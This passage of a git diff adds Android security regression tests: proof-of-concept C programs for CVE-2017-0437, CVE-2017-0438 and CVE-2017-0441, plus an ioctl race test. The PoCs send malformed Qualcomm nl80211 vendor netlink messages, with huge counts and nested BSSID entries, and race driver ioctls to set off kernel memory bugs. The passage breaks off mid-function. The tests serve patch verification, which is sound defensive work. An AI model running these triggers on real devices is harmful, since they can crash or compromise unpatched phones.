+#define US_SET_RX_INFO _IOW(USF_IOCTL_MAGIC, 3, struct us_rx_info_type)
+#define US_SET_RX_UPDATE \
+ _IOWR(USF_IOCTL_MAGIC, 4, struct us_rx_update_info_type)
+#define US_START_RX _IO(USF_IOCTL_MAGIC, 5)
+
+#define US_STOP_TX _IO(USF_IOCTL_MAGIC, 6)
+#define US_STOP_RX _IO(USF_IOCTL_MAGIC, 7)
+
+#define US_SET_TX_STREAM_PARAM \
+ _IOW(USF_IOCTL_MAGIC, 10, struct us_stream_param_type)
+#define US_GET_TX_STREAM_PARAM \
+ _IOWR(USF_IOCTL_MAGIC, 11, struct us_stream_param_type)
+#define US_SET_RX_STREAM_PARAM \
+ _IOW(USF_IOCTL_MAGIC, 12, struct us_stream_param_type)
+#define US_GET_RX_STREAM_PARAM \
+ _IOWR(USF_IOCTL_MAGIC, 13, struct us_stream_param_type)
+
+int fd;
+pthread_t thread_id[THREAD_NUM + 1] = {0};
+int thread_ret[THREAD_NUM] = {0};
+
+// RX configuration
+static struct us_rx_info_type s_rx_info;
+static struct us_rx_info_type s_rx_info1;
+
+static void set_valid_rx_configuration(void);
+static void set_valid_rx_configuration_for_fail(void);
+
+static void set_valid_rx_configuration() {
+ typedef struct {
+ unsigned short frameSize;
+ unsigned short groupFactor;
+ } TransparentDataRxType;
+ static TransparentDataRxType transparentRxData;
+ unsigned short frame_size = 0;
+
+ transparentRxData.frameSize = PortSamplesDataSize;
+ transparentRxData.groupFactor = 1;
+
+ s_rx_info.us_xx_info.client_name = "tester";
+ s_rx_info.us_xx_info.dev_id = 0;
+ s_rx_info.us_xx_info.stream_format = USF_RAW_FORMAT;
+ s_rx_info.us_xx_info.sample_rate = 96000;
+ s_rx_info.us_xx_info.buf_num = 3;
+ s_rx_info.us_xx_info.port_cnt = 1;
+ s_rx_info.us_xx_info.port_id[0] = 1;
+ s_rx_info.us_xx_info.bits_per_sample = 16;
+ s_rx_info.us_xx_info.params_data_size = sizeof(TransparentDataRxType);
+ s_rx_info.us_xx_info.params_data = (unsigned char*)&transparentRxData;
+
+ frame_size = PortSamplesDataSize *
+ (s_rx_info.us_xx_info.bits_per_sample / 8) *
+ s_rx_info.us_xx_info.port_cnt;
+ // group size
+ s_rx_info.us_xx_info.buf_size = frame_size * transparentRxData.groupFactor;
+} // set_valid_rx_configuration
+
+static void set_valid_rx_configuration_for_fail() {
+ typedef struct {
+ unsigned short frameSize;
+ unsigned short groupFactor;
+ } TransparentDataRxType;
+ static TransparentDataRxType transparentRxData;
+ unsigned short frame_size = 0;
+
+ transparentRxData.frameSize = PortSamplesDataSize;
+ transparentRxData.groupFactor = 1;
+
+ s_rx_info1.us_xx_info.client_name = "tester";
+ s_rx_info1.us_xx_info.dev_id = 0;
+ s_rx_info1.us_xx_info.stream_format = USF_RAW_FORMAT;
+ s_rx_info1.us_xx_info.sample_rate = 96000;
+ s_rx_info1.us_xx_info.buf_num = 3;
+ s_rx_info1.us_xx_info.port_cnt = 1;
+ s_rx_info1.us_xx_info.port_id[0] = 1;
+ s_rx_info1.us_xx_info.bits_per_sample = 16;
+ s_rx_info1.us_xx_info.params_data_size = sizeof(TransparentDataRxType);
+
+ frame_size = PortSamplesDataSize *
+ (s_rx_info1.us_xx_info.bits_per_sample / 8) *
+ s_rx_info1.us_xx_info.port_cnt;
+ // group size
+ s_rx_info1.us_xx_info.buf_size = frame_size * transparentRxData.groupFactor;
+ // for fail
+ s_rx_info1.us_xx_info.max_get_set_param_buf_size = (uint32_t) 100000000000000;
+} // set_valid_rx_configuration
+
+
+static int set_affinity(int num) {
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if (ret == -1) {
+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+void *child_ioctl_0(void *no_use) {
+ int ret = 1;
+ set_affinity(1);
+
+ while (1) {
+ ret = ioctl(fd, US_SET_RX_INFO, &s_rx_info1);
+ }
+}
+
+void* child_ioctl_1(void* no_use) {
+ int ret = 1;
+ set_affinity(2);
+
+ while (1) {
+ ret = ioctl(fd, US_SET_RX_INFO, &s_rx_info1);
+ }
+}
+
+int main() {
+ int i, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ set_valid_rx_configuration();
+ set_valid_rx_configuration_for_fail();
+
+ /* open dev */
+ fd = open(DEV, O_RDONLY);
+ if (fd == -1) {
+ return 0;
+ }
+
+ /* create thread */
+ for (i = 0; i < THREAD_NUM; i = i + 2) {
+ thread_ret[i] = pthread_create(thread_id + i, NULL, child_ioctl_0, NULL);
+ thread_ret[i + 1] =
+ pthread_create(thread_id + i + 1, NULL, child_ioctl_1, NULL);
+ }
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0437/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0437/Android.mk
new file mode 100644
index 0000000..12197cd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0437/Android.mk
@@ -0,0 +1,43 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License
+
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0437
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_C_INCLUDES:= \
+ $(TOP)/external/libnl/include/ \
+ $(TOP)/external/libnl/lib/ \
+
+LOCAL_SHARED_LIBRARIES:= libnl
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0437/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0437/poc.c
new file mode 100644
index 0000000..aa82a63
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0437/poc.c
@@ -0,0 +1,168 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <sys/wait.h>
+#include <dlfcn.h>
+#include <errno.h>
+#include <limits.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <jni.h>
+#include <android/log.h>
+#include <sys/socket.h>
+#include <linux/netlink.h>
+#include <linux/genetlink.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <dirent.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <net/if.h>
+#include <sys/types.h> /* See NOTES */
+#include <netlink/msg.h>
+#include <netlink/genl/genl.h>
+#include <netlink/genl/ctrl.h>
+#include <linux/nl80211.h>
+
+#define MAX_MSG_SIZE 4096
+#define GENLMSG_DATA(glh) ((void *)(NLMSG_DATA(glh) + GENL_HDRLEN))
+#define NLA_DATA(na) ((void *)((char *)(na) + NLA_HDRLEN))
+
+#define NL80211_ATTR_MAC 6
+#define ETH_ALEN 6
+#define NL80211_ATTR_IFINDEX 3
+#define QCA_NL80211_VENDOR_ID 0x001374
+
+#define QCA_NL80211_VENDOR_SUBCMD_ROAM 64
+#define QCA_WLAN_VENDOR_ATTR_ROAMING_SUBCMD 1
+#define QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BSSID_PREFS 4
+#define QCA_WLAN_VENDOR_ATTR_ROAMING_REQ_ID 2
+#define QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PREFS 14
+#define QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_NUM_BSSID 15
+#define QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_BSSID 16
+#define QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_RSSI_MODIFIER 17
+int test(void);
+int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
+ u_int8_t genl_version);
+
+typedef char tSirMacAddr[6];
+struct nl_sock *nl_sk;
+int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
+ u_int8_t genl_version) {
+ struct nl_msg *msg;
+ int ret = -1;
+ unsigned char dst[ETH_ALEN];
+ struct nlattr *rret;
+ struct nlattr *rret2;
+ struct nlattr *rret3;
+ unsigned char oper_classes[253];
+ int i = 0;
+ tSirMacAddr mac_in;
+ unsigned char hb_params[512];
+
+ struct nl80211_sta_flag_update flags;
+ msg = nlmsg_alloc();
+ int if_index = if_nametoindex("wlan0");
+
+ genlmsg_put(msg, nlmsg_pid, 0, nlmsg_type, 0, 0, genl_cmd, genl_version);
+ nla_put_u32(msg, NL80211_ATTR_IFINDEX, if_index);
+ nla_put_u32(msg, NL80211_ATTR_VENDOR_ID, QCA_NL80211_VENDOR_ID);
+ nla_put_u32(msg, NL80211_ATTR_VENDOR_SUBCMD, QCA_NL80211_VENDOR_SUBCMD_ROAM);
+
+ rret = nla_nest_start(msg, NL80211_ATTR_VENDOR_DATA);
+
+ if (!rret) {
+ return 1;
+ }
+ nla_put_u32(msg, QCA_WLAN_VENDOR_ATTR_ROAMING_SUBCMD,
+ QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BSSID_PREFS);
+
+ nla_put_u32(msg, QCA_WLAN_VENDOR_ATTR_ROAMING_REQ_ID, 123);
+ nla_put_u32(msg, QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_NUM_BSSID,
+ 0xffffffff);
+
+ rret2 =
+ nla_nest_start(msg, QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PREFS);
+ if (!rret2) {
+ perror("nla_nest_start2");
+ return 1;
+ }
+
+ for (i = 0; i < 64; ++i) {
+ rret3 =
+ nla_nest_start(msg, QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PREFS);
+ if (!rret3) {
+ perror("nla_nest_start3");
+ return 1;
+ }
+
+ nla_put(msg, QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_BSSID,
+ sizeof(mac_in), &mac_in);
+ nla_put_u32(msg,
+ QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_RSSI_MODIFIER,
+ 0xdeadbeed);
+ nla_nest_end(msg, rret3);
+ }
+
+ nla_nest_end(msg, rret2);
+ nla_nest_end(msg, rret);
+ ret = nl_send_auto_complete(nl_sk, msg);
+
+ return 0;
+}
+
+#define AID_INET 3003 /* can create AF_INET and AF_INET6 sockets */
+#define AID_NET_RAW 3004 /* can create raw INET sockets */
+#define AID_NET_ADMIN 3005
+
+int test() {
+ int fd = 0;
+ int i = 0;
+ int j = 0;
+ int ret = 0;
+ char *mem;
+ int family_id = 0;
+ struct audio_cal_basic *acb;
+ struct sockaddr_nl saddr;
+ int test = 0x1234;
+ if (getuid() != 0) {
+ return -1;
+ }
+
+ gid_t gid_groups[] = {AID_INET, AID_NET_ADMIN};
+ setgroups(sizeof(gid_groups) / sizeof(gid_groups[0]), gid_groups);
+
+ setuid(2000);
+
+ nl_sk = nl_socket_alloc();
+ ret = genl_connect(nl_sk);
+ if (ret != 0) {
+ return -1;
+ }
+
+ family_id = genl_ctrl_resolve(nl_sk, "nl80211");
+
+#define NL80211_CMD_GET_WIPHY 1
+#define NL80211_CMD_SET_STATION 18
+
+ ret = send_testmode(family_id, getpid(), NL80211_CMD_VENDOR, 1);
+ return 0;
+}
+
+int main(int argc, char *argv[]) { return test(); }
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0438/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0438/Android.mk
new file mode 100644
index 0000000..37bca2e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0438/Android.mk
@@ -0,0 +1,43 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License
+
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0438
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_C_INCLUDES:= \
+ $(TOP)/external/libnl/include/ \
+ $(TOP)/external/libnl/lib/ \
+
+LOCAL_SHARED_LIBRARIES:= libnl
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0438/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0438/poc.c
new file mode 100644
index 0000000..3b1b7d1
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0438/poc.c
@@ -0,0 +1,167 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <dlfcn.h>
+#include <limits.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <jni.h>
+#include <android/log.h>
+#include <sys/socket.h>
+#include <linux/netlink.h>
+#include <linux/genetlink.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <dirent.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <net/if.h>
+#include <sys/types.h> /* See NOTES */
+#include <netlink/msg.h>
+#include <netlink/genl/genl.h>
+#include <netlink/genl/ctrl.h>
+#include <linux/nl80211.h>
+
+#define MAX_MSG_SIZE 4096
+#define GENLMSG_DATA(glh) ((void *)(NLMSG_DATA(glh) + GENL_HDRLEN))
+#define NLA_DATA(na) ((void *)((char *)(na) + NLA_HDRLEN))
+
+#define NL80211_ATTR_MAC 6
+#define ETH_ALEN 6
+#define NL80211_ATTR_IFINDEX 3
+#define QCA_NL80211_VENDOR_ID 0x001374
+
+#define QCA_NL80211_VENDOR_SUBCMD_ROAM 64
+#define QCA_WLAN_VENDOR_ATTR_ROAMING_SUBCMD 1
+#define QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BSSID_PREFS 4
+#define QCA_WLAN_VENDOR_ATTR_ROAMING_REQ_ID 2
+#define QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PREFS 14
+#define QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_NUM_BSSID 15
+#define QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_BSSID 16
+#define QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_RSSI_MODIFIER 17
+#define QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BLACKLIST_BSSID 6
+#define QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS 18
+#define QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS_NUM_BSSID 19
+#define QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS_BSSID 20
+typedef char tSirMacAddr[6];
+struct nl_sock *nl_sk;
+int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
+ u_int8_t genl_version);
+int test(void);
+
+int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
+ u_int8_t genl_version) {
+ struct nl_msg *msg;
+ int ret = -1;
+ unsigned char dst[ETH_ALEN];
+ struct nlattr *rret;
+ struct nlattr *rret2;
+ struct nlattr *rret3;
+ unsigned char oper_classes[253];
+ int i = 0;
+ tSirMacAddr mac_in;
+ unsigned char hb_params[512];
+
+ struct nl80211_sta_flag_update flags;
+ msg = nlmsg_alloc();
+ int if_index = if_nametoindex("wlan0");
+
+ genlmsg_put(msg, nlmsg_pid, 0, nlmsg_type, 0, 0, genl_cmd, genl_version);
+ nla_put_u32(msg, NL80211_ATTR_IFINDEX, if_index);
+ nla_put_u32(msg, NL80211_ATTR_VENDOR_ID, QCA_NL80211_VENDOR_ID);
+ nla_put_u32(msg, NL80211_ATTR_VENDOR_SUBCMD, QCA_NL80211_VENDOR_SUBCMD_ROAM);
+
+ rret = nla_nest_start(msg, NL80211_ATTR_VENDOR_DATA);
+
+ if (!rret) {
+ return 1;
+ }
+ nla_put_u32(msg, QCA_WLAN_VENDOR_ATTR_ROAMING_REQ_ID, 123);
+ nla_put_u32(msg, QCA_WLAN_VENDOR_ATTR_ROAMING_SUBCMD,
+ QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BLACKLIST_BSSID);
+
+ nla_put_u32(msg,
+ QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS_NUM_BSSID,
+ 0xffffffff);
+
+ rret2 =
+ nla_nest_start(msg, QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS);
+ if (!rret2) {
+ return 1;
+ }
+
+ for (i = 0; i < 64; ++i) {
+ rret3 = nla_nest_start(msg,
+ QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS);
+ if (!rret3) {
+ return 1;
+ }
+ nla_put(msg, QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS_BSSID,
+ sizeof(mac_in), &mac_in);
+ nla_nest_end(msg, rret3);
+ }
+
+ nla_nest_end(msg, rret2);
+ nla_nest_end(msg, rret);
+
+ ret = nl_send_auto_complete(nl_sk, msg);
+
+ return 0;
+}
+
+#define AID_INET 3003 /* can create AF_INET and AF_INET6 sockets */
+#define AID_NET_RAW 3004 /* can create raw INET sockets */
+#define AID_NET_ADMIN 3005
+
+int test() {
+ int fd = 0;
+ int i = 0;
+ int j = 0;
+ int ret = 0;
+ char *mem;
+ int family_id = 0;
+ struct audio_cal_basic *acb;
+ struct sockaddr_nl saddr;
+ int test = 0x1234;
+ if (getuid() != 0) {
+ return -1;
+ }
+
+ gid_t gid_groups[] = {AID_INET, AID_NET_ADMIN};
+ setgroups(sizeof(gid_groups) / sizeof(gid_groups[0]), gid_groups);
+
+ setuid(2000);
+
+ nl_sk = nl_socket_alloc();
+ ret = genl_connect(nl_sk);
+ if (ret != 0) {
+ perror("genl_connect");
+ return -1;
+ }
+
+ family_id = genl_ctrl_resolve(nl_sk, "nl80211");
+
+#define NL80211_CMD_GET_WIPHY 1
+#define NL80211_CMD_SET_STATION 18
+
+ ret = send_testmode(family_id, getpid(), NL80211_CMD_VENDOR, 1);
+ return 0;
+}
+
+int main(int argc, char *argv[]) { return test(); }
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0441/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0441/Android.mk
new file mode 100644
index 0000000..f8fface
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0441/Android.mk
@@ -0,0 +1,43 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License
+
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0441
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_C_INCLUDES:= \
+ $(TOP)/external/libnl/include/ \
+ $(TOP)/external/libnl/lib/ \
+
+LOCAL_SHARED_LIBRARIES:= libnl
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0441/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0441/poc.c
new file mode 100644
index 0000000..cb65ce4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0441/poc.c
@@ -0,0 +1,206 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <dlfcn.h>
+#include <limits.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <jni.h>
+#include <android/log.h>
+#include <sys/socket.h>
+#include <linux/netlink.h>
+#include <linux/genetlink.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <dirent.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <net/if.h>
+#include <sys/types.h> /* See NOTES */
+#include <netlink/msg.h>
+#include <netlink/genl/genl.h>
+#include <netlink/genl/ctrl.h>
+#include <linux/nl80211.h>
+
+#define MAX_MSG_SIZE 1024
+#define GENLMSG_DATA(glh) ((void *)(NLMSG_DATA(glh) + GENL_HDRLEN))
+#define NLA_DATA(na) ((void *)((char *)(na) + NLA_HDRLEN))
+
+#define KGSL_IOC_TYPE 0x09
+
+struct kgsl_perfcounter_query_compat {
+ unsigned int groupid;
+ unsigned int countables;
+ unsigned int count;
+ unsigned int max_counters;
+ unsigned int __pad[2];
+};
+struct kgsl_perfcounter_read_group {
+ unsigned int groupid;
+ unsigned int countable;
+ unsigned long long value;
+};
+#define IOCTL_KGSL_PERFCOUNTER_QUERY_COMPAT \
+ _IOWR(KGSL_IOC_TYPE, 0x3A, struct kgsl_perfcounter_query_compat)
+
+struct kgsl_perfcounter_read_compat {
+ unsigned int reads;
+ unsigned int count;
+ unsigned int __pad[2];
+};
+
+#define CAL_IOCTL_MAGIC 'a'
+
+#define AUDIO_GET_CALIBRATION _IOWR(CAL_IOCTL_MAGIC, 204, void *)
+
+#define NL80211_ATTR_MAC 6
+#define ETH_ALEN 6
+
+struct nl_sock *nl_sk;
+#define NL80211_ATTR_IFINDEX 3
+enum wlan_hdd_tm_attr {
+ WLAN_HDD_TM_ATTR_INVALID = 0,
+ WLAN_HDD_TM_ATTR_CMD = 1,
+ WLAN_HDD_TM_ATTR_DATA = 2,
+ WLAN_HDD_TM_ATTR_STREAM_ID = 3,
+ WLAN_HDD_TM_ATTR_TYPE = 4,
+ /* keep last */
+ WLAN_HDD_TM_ATTR_AFTER_LAST,
+ WLAN_HDD_TM_ATTR_MAX = WLAN_HDD_TM_ATTR_AFTER_LAST - 1,
+};
+
+enum wlan_hdd_tm_cmd {
+ WLAN_HDD_TM_CMD_WLAN_FTM = 0,
+ WLAN_HDD_TM_CMD_WLAN_HB = 1,
+};
+
+#define QCA_NL80211_VENDOR_ID 0x001374
+
+#define QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_SET_SIGNIFICANT_CHANGE 32
+#define QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_REQUEST_ID 1
+#define QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_RSSI_SAMPLE_SIZE \
+ 27
+#define QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_LOST_AP_SAMPLE_SIZE \
+ 28
+#define QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_MIN_BREACHING 29
+#define QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_NUM_AP 30
+#define QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM 26
+int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
+ u_int8_t genl_version);
+int test(void);
+int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
+ u_int8_t genl_version) {
+ struct nl_msg *msg;
+ int ret = -1;
+ unsigned char dst[ETH_ALEN];
+ struct nlattr *rret;
+ struct nlattr *rret1;
+ unsigned char oper_classes[253];
+
+ unsigned char hb_params[512];
+
+ struct nl80211_sta_flag_update flags;
+ msg = nlmsg_alloc();
+ int if_index = if_nametoindex("wlan0");
+
+ genlmsg_put(msg, nlmsg_pid, 0, nlmsg_type, 0, 0, genl_cmd, genl_version);
+
+ nla_put_u32(msg, NL80211_ATTR_IFINDEX, if_index);
+
+ nla_put_u32(msg, NL80211_ATTR_VENDOR_ID, QCA_NL80211_VENDOR_ID);
+
+ nla_put_u32(msg, NL80211_ATTR_VENDOR_SUBCMD,
+ QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_SET_SIGNIFICANT_CHANGE);
+
+ rret = nla_nest_start(msg, NL80211_ATTR_VENDOR_DATA);
+
+ if (!rret) {
+ return 1;
+ }
+
+ nla_put_u32(msg, QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_REQUEST_ID,
+ 1);
+ nla_put_u32(
+ msg,
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_RSSI_SAMPLE_SIZE,
+ 1);
+ nla_put_u32(
+ msg,
